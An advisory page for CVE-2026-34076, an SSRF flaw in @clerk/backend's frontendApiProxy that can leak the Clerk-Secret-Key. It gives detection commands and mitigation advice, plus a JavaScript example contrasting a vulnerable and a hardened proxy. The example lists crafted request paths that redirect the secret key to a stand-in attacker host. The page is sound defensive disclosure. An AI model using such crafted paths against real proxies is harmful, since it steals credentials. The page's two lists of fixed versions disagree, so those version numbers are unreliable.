Platform
nodejs
Component
@clerk/backend
Fixed in
0.1.1
2.0.1
3.0.1
3.1.1
3.2.3
CVE-2026-34076 describes a Server-Side Request Forgery (SSRF) vulnerability found in the @clerk/backend Node.js package. This flaw allows an unauthenticated attacker to potentially extract the application's Clerk-Secret-Key by crafting malicious request paths. The vulnerability affects applications that have explicitly enabled the frontendApiProxy feature, which is not enabled by default; users of @clerk/nextjs are not affected. A fix is available in version 3.2.3.
The primary impact of CVE-2026-34076 is the potential exposure of the Clerk-Secret-Key. This key is crucial for authentication and authorization within Clerk applications. If an attacker obtains this key, they could impersonate legitimate users, access sensitive data, and potentially compromise the entire application. The attack vector involves crafting a specific request path that tricks the clerkFrontendApiProxy function into sending the secret key to a server controlled by the attacker. This is a significant risk, particularly for applications handling sensitive user data or financial transactions.
This vulnerability was publicly disclosed on March 27, 2026. There is no indication of active exploitation at this time, and it is not currently listed on the CISA KEV catalog. Public proof-of-concept (PoC) code is not widely available, but the vulnerability's nature makes it relatively straightforward to exploit once the application is identified as using the vulnerable version of @clerk/backend with the frontendApiProxy feature enabled.
Applications built with @clerk/backend that have explicitly enabled the frontendApiProxy feature are at risk. This includes applications utilizing Clerk's authentication and authorization services and relying on the Clerk-Secret-Key for secure operation. Developers who have not recently reviewed their dependencies or are using older versions of @clerk/backend are particularly vulnerable.
• nodejs / server:
npm list @clerk/backend
• nodejs / server:
grep -rE 'frontendApiProxy|clerkFrontendApiProxy' ./src
• nodejs / server:
find ./node_modules -path '*/@clerk/backend/package.json' -exec grep -m1 '"version"' {} +
Disclosure
March 27, 2026
Exploit Status
EPSS
0.04% (14th percentile)
CISA SSVC
CVSS-vector
The recommended mitigation for CVE-2026-34076 is to upgrade @clerk/backend to version 3.2.3 or later, which contains the fix for the SSRF. If upgrading is not immediately feasible, disable the frontendApiProxy feature in your application configuration; the feature is off by default, so disabling it removes the vulnerable code path entirely. As a stopgap while the feature stays enabled, validate proxied request paths server-side and refuse any path that would make the proxy send the request, and with it the Clerk-Secret-Key, to a host other than the configured Clerk Frontend API. After upgrading, confirm the fix by replaying a crafted request against the proxy endpoint and verifying that the Clerk-Secret-Key is never sent to a host you do not control.
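The following is an added illustration of the failure mode the advisory describes, written for this page; it is not @clerk/backend's code. It shows a minimal proxy-target builder that resolves the incoming request path against the upstream Frontend API and attaches the secret key, first in the vulnerable shape and then hardened with the origin check suggested above. The upstream host, the header name and the key value are assumptions, and the sample paths are constructed. It also covers a case the text does not spell out: for https URLs the WHATWG parser treats a backslash as a slash, so a path-prefix check alone is not enough.

```javascript
// Added example, not @clerk/backend's code: a minimal proxy-target builder in
// the shape the advisory describes (incoming request path resolved against the
// Clerk Frontend API, secret key attached), in a vulnerable and a hardened form.
// The upstream host, header name and secret value below are assumptions.

const CLERK_FRONTEND_API = 'https://frontend-api.example.test'; // assumed upstream
const CLERK_SECRET_KEY = 'sk_test_CONSTRUCTED_PLACEHOLDER';      // constructed, not real

// Vulnerable pattern: WHATWG URL resolution lets a "path" replace the host.
//   '//evil.test/v1'       -> https://evil.test/v1  (protocol-relative)
//   '/\\evil.test/v1'      -> https://evil.test/v1  (backslash is a slash for https)
//   'https://evil.test/v1' -> https://evil.test/v1  (absolute URL wins outright)
function buildUpstreamRequestVulnerable(requestPath) {
  const target = new URL(requestPath, CLERK_FRONTEND_API);
  return { url: target.href, headers: { 'Clerk-Secret-Key': CLERK_SECRET_KEY } };
}

// Hardened pattern: require a plain relative path, then re-check the resolved
// origin. The origin comparison is the check that matters; the prefix test
// alone would miss the backslash variant.
function buildUpstreamRequestHardened(requestPath) {
  if (typeof requestPath !== 'string' || !requestPath.startsWith('/') || requestPath.startsWith('//')) {
    throw new Error('request path must be a relative path beginning with a single "/"');
  }
  const base = new URL(CLERK_FRONTEND_API);
  const target = new URL(requestPath, base);
  if (target.origin !== base.origin) {
    throw new Error(`refusing to proxy to ${target.origin}`);
  }
  return { url: target.href, headers: { 'Clerk-Secret-Key': CLERK_SECRET_KEY } };
}

// Which host would end up receiving the secret key for a given builder and path?
function keyRecipientHost(builder, requestPath) {
  try {
    return { allowed: true, host: new URL(builder(requestPath).url).host };
  } catch (err) {
    return { allowed: false, reason: err.message };
  }
}

// Constructed sample paths: one legitimate, three attacker-crafted.
const SAMPLE_PATHS = ['/v1/client', '//evil.test/v1', '/\\evil.test/v1', 'https://evil.test/v1'];

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of SAMPLE_PATHS) {
    console.log(
      JSON.stringify(p).padEnd(24),
      'vulnerable ->', JSON.stringify(keyRecipientHost(buildUpstreamRequestVulnerable, p)),
      '| hardened ->', JSON.stringify(keyRecipientHost(buildUpstreamRequestHardened, p)),
    );
  }
}
```

Run it with `node` to see that the vulnerable builder hands the key to `evil.test` for all three crafted paths while the hardened builder rejects them and still serves `/v1/client`. The same origin comparison is what a stopgap input check in front of the proxy should implement until the upgrade lands.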
Update the packages @clerk/hono, @clerk/express, @clerk/backend and @clerk/fastify to versions 0.1.5, 2.0.7, 3.2.3 and 3.1.5 respectively, or later. This corrects the SSRF vulnerability that can expose the Clerk secret key.
CVE-2026-34076 is a Server-Side Request Forgery (SSRF) vulnerability in the @clerk/backend Node.js package, allowing attackers to potentially extract the Clerk-Secret-Key.
You are affected if you use @clerk/backend versions prior to 3.2.3 and have enabled the frontendApiProxy feature. Users of @clerk/nextjs are not affected.
Upgrade to @clerk/backend version 3.2.3 or later, or disable the frontendApiProxy feature in your application configuration.
There is currently no indication of active exploitation of CVE-2026-34076.
Refer to the Clerk security advisory for detailed information and updates: [https://clerk.com/docs/security](https://clerk.com/docs/security)